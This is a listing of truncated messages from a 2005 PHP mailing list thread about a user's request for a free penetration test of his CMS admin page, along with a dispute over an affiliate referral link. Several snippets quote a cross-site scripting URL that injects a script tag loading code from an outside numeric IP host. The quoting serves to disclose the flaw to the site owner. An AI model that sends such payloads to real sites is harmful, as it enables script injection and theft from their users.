Re: [PHP] Re: Free penetration test

Hehe, well put...a few things you forgot to write: Ryan A and Rory Browne got so irritated because its like talking to a tree.in english when the tree only understands some other language :-D that they tried to throw in the towel I was so fed up I was going to drop the whole thing because cer

Re: [PHP] Re: Free penetration test

>BTW, what do you call to a person that throws stones to another and then >runs away to not face the consequences?! Fine, I'll play your game a little longer...but offlist as I think the list has had enough of this, I'm also a bit busy now so expect a reply from me after a few hours. Regards, Rya

Re: [PHP] Re: Free penetration test

Hello, on 05/30/2005 02:21 PM Ryan A said the following: Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (rec

Re: [PHP] Re: Free penetration test

Hi, This is getting pretty irritating because by now even a stone would have understood what I was trying to say...so either you are playing dumb or you just dont want to understand, that said, this is my last response as I have much better things to do than say the same thing over and over...

RE: [PHP] Re: Free penetration test

> For me, of course there is nothing wrong on the PHP Group help > themselves making money with referrals. My point is that it is pretty > common to not distract people with the details of who gets what with > referrals because it does not change anything for who follows a link > with our without t

RE: [PHP] Re: Free penetration test

> -Original Message- > From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED] > Sent: Saturday, May 28, 2005 3:48 PM > To: Ryan A > Cc: php > Subject: Re: [PHP] Re: Free penetration test > > Ryan A wrote: > > That is extremly generious of you as I didnt really think

Re: [PHP] Re: Free penetration test

Hello, on 05/27/2005 11:50 PM Ryan A said the following: I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. fair enough, you could h

Re: [PHP] Re: Free penetration test

> > mostly in Swedish...I can give you a > "star > > account" (Star accounts are the > > paid accounts) for you to login and test the site, but do you think you > > could still test it since its mostly > > in Swedish? > Ja, jeg tror jeg kan klare det. Sproget er ret ligegyldigt, jeg checker > b

Re: [PHP] Re: Free penetration test

Ryan A wrote: > That is extremly generious of you as I didnt really think you would have the > time considering the > amount of projects,books etc you are involved with (yep, I read your CV on > your site :-D ), but > I would like to take you up on your offer as I am sure to learn something > from

Re: [PHP] Re: Free penetration test

Hi, > > Is it bad to give field names the same name as their database > > counterpart? i.e. In a database the first name column might be known as > > 'fname'. Should a form field called 'fname' NOT be created? I actually had the same question a little while ago and after doing some reading it lef

Re: [PHP] Re: Free penetration test

Okay: 1: Calm down. You're sensationalism and paranoia make you look like a nutcase.(no offence) 2: > That would be irrelevant because nothing changes for the anybody that > follows the link with or without the aff code. The service is still free Obviously we don't consider it irrelevent. That'

Re: [PHP] Re: Free penetration test

Hello, on 05/27/2005 06:46 PM Ryan A said the following: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, y

Re: [PHP] Re: Free penetration test

Hello, on 05/27/2005 05:30 PM Rory Browne said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server O

Re: [PHP] Re: Free penetration test

Hi, > > I have requested the free test several times and it was very useful > > because it brought my attention to aspects that I was not considering, > > some related to PHP in specific and other related to Internet in general. > > > fair enough, you could have given him the link the the page dir

Re: [PHP] Re: Free penetration test

On Saturday 28 May 2005 01:05, Chris W. Parker wrote: > Rasmus Lerdorf > > on Friday, May 27, 2005 11:58 AM said: > >>> You have all sorts of problems at that URL. To start with, here is > >>> a cross-site scripting hack: > > http://www.vlaamse-kern.com/yourstore-0.0

Re: [PHP] Re: Free penetration test

Chris W. Parker wrote: > Rasmus Lerdorf > on Friday, May 27, 2005 11:58 AM said: > > You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: > > http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22

RE: [PHP] Re: Free penetration test

Rasmus Lerdorf on Friday, May 27, 2005 11:58 AM said: >>> You have all sorts of problems at that URL. To start with, here is >>> a cross-site scripting hack: >>> >>> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 >>> src%3D%22http://3

Re: [PHP] Re: Free penetration test

Chris W. Parker wrote: > One question. (Because I'm a lame brain when it comes to security as I'm > not good at imagining how things can be exploited): > > Is it bad to give field names the same name as their database > counterpart? i.e. In a database the first name column might be known as > 'fna

RE: [PHP] Re: Free penetration test

Rasmus Lerdorf on Friday, May 27, 2005 4:15 PM said: > He was apparently doing something along the lines of: > > foreach($_GET as $key=>$val) { > echo << > EOL; > } > > Probably just a lazyness thing. Generally you will want to keep track > of which query

Re: [PHP] Re: Free penetration test

On 5/27/05, Manuel Lemos <[EMAIL PROTECTED]> wrote: > Hello, > > on 05/27/2005 02:30 PM Ryan A said the following: > >>You may want to try Security Space services. They perform many types of > >>security checks remotely including penetration tests that may reveal > >>serious vulnerabilities in you

Re: [PHP] Re: Free penetration test

> > Umm, you forgot to mention that you are "connected" to that site and you > get a commision for sending them clients, if they sign up. > > Nothing wrong with getting an affiliate buck mind you, I have a few > > affiliate accounts around too, but I (and others on the list i have noticed, Jay B f

Re: [PHP] Re: Free penetration test

Andy Pieters wrote: > On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: > >>You have all sorts of problems at that URL. To start with, here is a >>cross-site scripting hack: >> >>http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 >>src%3D%22http://3423329163/v > > > Hi

Re: [PHP] Re: Free penetration test

On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: > You have all sorts of problems at that URL. To start with, here is a > cross-site scripting hack: > > http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 >src%3D%22http://3423329163/v Hi Thank you! I just saw the potent

Re: [PHP] Re: Free penetration test

Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS ver

Re: [PHP] Re: Free penetration test

> on 05/23/2005 06:19 AM Andy Pieters said the following: > >> I am looking at where I can get my system tested for penetration. >> >> In case someone here would like to have a go >> >> This is the url >> >> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ >> >> It is actually a kind of CM

Re: [PHP] Re: Free penetration test

> You may want to try Security Space services. They perform many types of > security checks remotely including penetration tests that may reveal > serious vulnerabilities in your servers. Such vulnerabilities include > holes, in your server OS version, Web and e-mail servers and even in the > PHP v

[PHP] Re: Free penetration test

Hello, on 05/23/2005 06:19 AM Andy Pieters said the following: I am looking at where I can get my system tested for penetration. In case someone here would like to have a go This is the url http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ It is actually a kind of CMS system so if som